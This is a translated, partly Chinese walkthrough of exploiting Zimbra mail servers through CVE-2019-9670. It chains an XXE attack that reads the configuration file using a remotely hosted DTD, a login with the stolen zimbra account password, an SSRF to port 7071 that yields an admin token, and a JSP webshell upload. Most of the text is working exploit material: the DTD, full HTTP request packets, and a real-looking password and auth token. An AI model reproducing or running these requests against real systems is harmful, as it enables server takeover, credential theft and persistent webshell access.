The first step: use XXE reads the configuration file
Here the use of the CVE-2019-9670 vulnerability to read the configuration file, you need to place a dtd file on your own VPS server, and the file can be accessed via HTTP. To demonstrate, I created a repository on GitHub, get dtd file from GitHub.
The figure above is circled with a red box zimbra account password, will be used after the first down.
dtd document reads as follows:
1 <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> 2 <!ENTITY % start "<![CDATA["> 3 <!ENTITY % end "]]>"> 4 <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
POST request packet as follows:
POST /Autodiscover/Autodiscover.xml HTTP/1.1 Host: mail.****.com User-Agent: Mozilla/5.0 (Windows NT 10.0;) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2 Accept-Encoding: gzip, deflate Referer: https://mail.****.com/zimbra/ Content-Type: application/soap+xml Content-Length: 436 Connection: close Cookie: ZM_TEST=true Upgrade-Insecure-Requests: 1 <!DOCTYPE Autodiscover [ <!ENTITY % dtd SYSTEM "http://192.168.3.5/dtd"> %dtd; %all; ]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema> </Request> </Autodiscover>
Step Two: Get the low-privilege token
From the map you can see the token has been acquired, but the token after token is not an administrator privileges to use temporarily down.
POST request packet as follows:
POST /service/soap HTTP/1.1 Host: mail.****.com User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2 Accept-Encoding: gzip, deflate Referer: https://mail.****.com/zimbra/ Content-Type: application/soap+xml Content-Length: 467 Connection: close Cookie: ZM_TEST=true Upgrade-Insecure-Requests: 1 <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"> <soap:Header> <context xmlns="urn:zimbra"> <userAgent name="ZimbraWebClient" version="5.0.15_GA_2851"/> </context> </soap:Header> <soap:Body> <AuthRequest xmlns="urn:zimbraAccount"> <account by="adminName">zimbra</account> <password>GzXaU76_s5</password> </AuthRequest> </soap:Body> </soap:Envelope>
第三步、利用SSRF获取admin权限token
将上一步获取到了低权限token添加到cookie中,将xmlns="urn:zimbraAccount"修改为xmlns="urn:zimbraAdmin",在Host字段末尾添加“:7071”,URL中的target要使用https协议。然后发送请求即可获得admin权限的token。
POST请求包如下:
POST /service/proxy?target=https://127.0.0.1:7071/service/admin/soap HTTP/1.1 Host: mail.****.com:7071 User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2 Accept-Encoding: gzip, deflate Referer: https://mail.****.com/zimbra/ Content-Type: application/soap+xml Content-Length: 465 Connection: close Cookie: ZM_ADMIN_AUTH_TOKEN=0_5221766f264e4dcb78b4f67be5f839b1ed668da3_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343733303133353638333b747970653d363a7a696d6272613b7469643d393a3735353034333637323b Upgrade-Insecure-Requests: 1 <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"> <soap:Header> <context xmlns="urn:zimbra"> <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851"/> </context> </soap:Header> <soap:Body> <AuthRequest xmlns="urn:zimbraAdmin"> <account by="adminName">zimbra</account> <password>GzXaU76_s5</password> </AuthRequest> </soap:Body> </soap:Envelope>
The fourth step is to upload webshell
The last step acquired admin privileges token added to the cookie, then upload webshell.
Webshell path /downloads/k4x6p.jsp, you need to add admin_toke in a cookie when accessing the webshell.
You can use this to create a pony webshell chopper connection is available in other cookie without the need to access the directory.
I mainly do some finishing work, thank you big brother online article written analysis.
Reference links:
https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html
https://blog.csdn.net/fnmsd/article/details/88657083
http://www.cnvd.org.cn/flaw/show/CNVD-2019-07448
http://www.cnvd.org.cn/flaw/download?cd=20f07bbf4fc4769b606a52a0d14f79dd